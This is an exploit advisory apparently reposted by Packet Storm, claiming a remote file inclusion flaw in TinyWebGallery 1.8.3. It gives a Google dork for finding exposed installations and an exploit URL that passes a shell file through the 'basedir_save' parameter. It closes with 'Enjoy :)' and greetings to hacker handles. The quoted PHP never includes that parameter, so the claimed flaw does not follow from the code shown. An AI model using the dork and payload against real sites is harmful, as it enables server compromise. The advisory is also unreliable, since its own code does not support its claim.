TinyWebGallery version 1.8.3 suffers from a remote file inclusion vulnerability.
d9f3d93683b53905922869a87d558455d1ba75adeed903844012614e470490ba# Exploit Title: TinyWebGallery v 1.8.3 Remote file include vulnerbility
# Google Dork: Photo Gallery powered by TinyWebGallery 1.8.3
# Date: 26/1/2011
# Author: DIES3L
# Software Link: http://www.tinywebgallery.com
# Version: v 1.8.3
# Tested on: ubuntu + win7
# Email : zxn@Hotmail.com
#######################################################
Fichier : i_basic.inc.php
http://localhost/[path]/i_frames/i_basic.inc.php
Code :
<?php
include '../config.php';
$basedir_save = $basedir;
?>
Exploit :
http://127.0.0.1/[path]/i_frames/i_basic.inc.php?basedir_save= [ Shell.txt ]
Enjoy :)
##########################################################
#
Greetz To : #
RoMaNcYxHaCkEr - saudi0hacker - aB0-3tH4b T3rR0r - TakEr #
#
##########################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed